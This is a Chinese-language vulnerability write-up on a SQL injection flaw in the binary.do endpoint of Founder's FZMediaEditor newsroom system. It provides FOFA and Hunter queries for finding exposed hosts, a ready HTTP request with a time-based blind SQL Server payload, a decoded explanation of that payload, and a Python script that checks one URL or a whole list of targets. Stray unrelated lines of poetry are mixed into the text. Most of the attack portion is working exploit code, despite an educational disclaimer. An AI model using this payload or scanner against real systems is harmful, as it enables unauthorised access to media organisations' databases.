声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
文章目录
- 漏洞描述
- 漏洞复现
- 测试工具
漏洞描述
方正全媒体采编系统(FZMediaEditor)是一款专业的新闻采编系统,用于新闻机构、媒体公司等组织进行新闻的采编、编辑和发布管理。其binary.do接口的pTableName参数对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
漏洞复现
1)信息收集
fofa:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
hunter:web.body="/newsedit/newsedit/"||app.name="北大方正全媒体采编系统"
我们的科学永远只是找到近似真理。
2)构造数据包
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host:ip
Content-Type: application/x-www-form-urlencodedTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
代码分析
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
这个payload经过URL编码,我们首先需要对其进行解码。URL编码通常用百分号(%)后跟两位十六进制数来表示特殊字符。下面是解码后的payload:
TableName=DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5'; select DOM_IMAGE from IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
现在我们来分析这个解码后的payload:
-
TableName=DOM_IMAGE where REFID=-1:
- 这是尝试访问名为
DOM_IMAGE的表,并添加了一个条件REFID=-1。但通常TableName不应该包含where子句,这是SQL注入的一部分。
- 这是尝试访问名为
-
union select ‘1’;:
- 这里使用了
UNION操作符,尝试执行一个简单的select语句,返回字符串'1'。
- 这里使用了
-
WAITFOR DELAY ‘0:0:5’;:
- 这行代码是SQL Server特有的,用于使当前SQL语句执行延迟5秒。这通常用于时间盲注攻击,攻击者通过测量SQL语句的执行时间来推断数据库中的信息。
-
select DOM_IMAGE from IMG_LARGE_PATH:
- 这又是一个
SELECT语句,尝试从IMG_LARGE_PATH表中选择DOM_IMAGE字段。
- 这又是一个
-
&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1:
- 这些参数是Web表单的一部分,被用于构造SQL查询。
响应时间延迟5秒,存在sql注入。
测试工具
poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarning# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)# 定义红色和重置终端输出格式的常量
RED = '\033[91m'
RESET = '\033[0m'def check_vulnerability(url):"""检查给定URL是否存在特定的SQL注入漏洞。:param url: 要检查的URL"""try:# 构造攻击URL和payloadattack_url = url.rstrip('/') + "/newsedit/newsplan/task/binary.do"attack_payload = """TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A3%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1"""# 设置请求头信息headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0','Accept': '*/*','Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2','Content-Type': 'application/x-www-form-urlencoded','Accept-Encoding': 'gzip, deflate'}# 记录请求开始时间start_time = time.time()# 发送POST请求response = requests.post(attack_url, headers=headers, data=attack_payload, verify=False, timeout=10)# 计算请求耗时elapsed_time = time.time() - start_time# 根据耗时判断是否存在漏洞if 3 < elapsed_time < 5:print(f"{RED}URL [{url}] 可能存在方正全媒体采编系统binary.do存在SQL注入漏洞{RESET}")else:print(f"URL [{url}] 不存在漏洞")except requests.exceptions.Timeout:# 请求超时,提示可能存在漏洞print(f"URL [{url}] 请求超时,可能存在漏洞")except requests.RequestException as e:# 请求异常,打印错误信息print(f"URL [{url}] 请求失败: {e}")def main():"""程序主入口,负责解析命令行参数并调用漏洞检查函数。"""# 解析命令行参数parser = argparse.ArgumentParser(description='检测目标地址是否存在方正全媒体采编系统binary.do存在SQL注入漏洞')parser.add_argument('-u', '--url', help='指定目标地址')parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')args = parser.parse_args()# 处理命令行参数if args.url:# 添加http协议头如果缺失if not args.url.startswith("http://") and not args.url.startswith("https://"):args.url = "http://" + args.urlcheck_vulnerability(args.url)elif args.file:# 读取文件中的所有URL并检查with open(args.file, 'r') as file:urls = file.read().splitlines()for url in urls:# 添加http协议头如果缺失if not url.startswith("http://") and not url.startswith("https://"):url = "http://" + urlcheck_vulnerability(url)if __name__ == '__main__':main()
运行截图
须晴日,看红装素裹,分外妖娆。
